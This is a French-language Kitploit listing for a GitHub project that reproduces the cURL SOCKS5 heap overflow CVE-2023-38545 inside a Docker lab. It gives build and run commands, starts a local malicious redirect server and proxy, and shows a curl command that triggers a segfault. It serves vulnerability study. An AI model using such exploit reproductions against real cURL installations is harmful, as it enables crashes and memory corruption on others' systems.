Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/vanigori/cve-2023-38545-sample
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationSécurité WebApprentissage et ÉducationLabs et Pratique
GitHubvanigori/cve-2023-38545-sample

CVE-2023-38545-sample

Dockerfile contenant tous les fichiers de configuration nécessaires pour démontrer l'exploit.

Voir le dépôt
32il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Description rapide

Ceci présente la cURL CVE-2023-38545. C'est aussi léger que possible.

Configuration

Tout d'abord, construisez l'image Docker :

docker build . -t cveimage

Ensuite, exécutez simplement le fichier image, créant un conteneur Docker temporaire qui sera supprimé une fois le conteneur arrêté :

docker run --rm --tty --net="host" --name cvecontainer cveimage

Si vous avez du mal à taper les commandes, ouvrez simplement un autre terminal et exécutez :

docker exec -it cvecontainer /bin/bash

Maintenant, nous devons démarrer tous les services. Connectez-vous au conteneur déjà en cours d'exécution et exécutez :

./exploit/malicious_redirect_server.sh &

python3 /exploit/proxy.py &

Maintenant, depuis l'intérieur du conteneur, vous pouvez voir l'exploit cURL en action :

curl -vvv --limit-rate 100 --location --proxy socks5h://127.0.0.1:1080 http://localhost:8000

Vous devez voir une erreur de segmentation fault sur la machine qui a exécuté la commande curl pour savoir que l'exploit a réussi. Si vous ne la voyez pas, soit l'exploit ne s'est pas produit, soit le processus avait tellement d'espace de heap disponible que vous n'avez pas écrasé la mémoire inaccessible.

Plus de travail (PRs bienvenues)

  • Rendre ce README joli
  • Configurer systemd pour démarrer automatiquement le code d'exploit
  • Réduire le temps de construction et la taille de l'image Docker
  • Tout et n'importe quoi d'autre… ?

Références

  • Le proxy socks5 n'est pas fait maison. Le code original du proxy se trouve ici : https://github.com/alexbers/tgsocksproxy
    • Exploité à l'origine dans ubuntu (wsl) avec support systemd : https://github.com/aire1/mtproxy_autoinstaller
  • Le rapport hackerone, qui a permis d'économiser des tonnes de temps de recherche. Lisez-le si vous voulez comprendre comment cet exploit se produit : https://hackerone.com/reports/2187833
Télécharger l’outil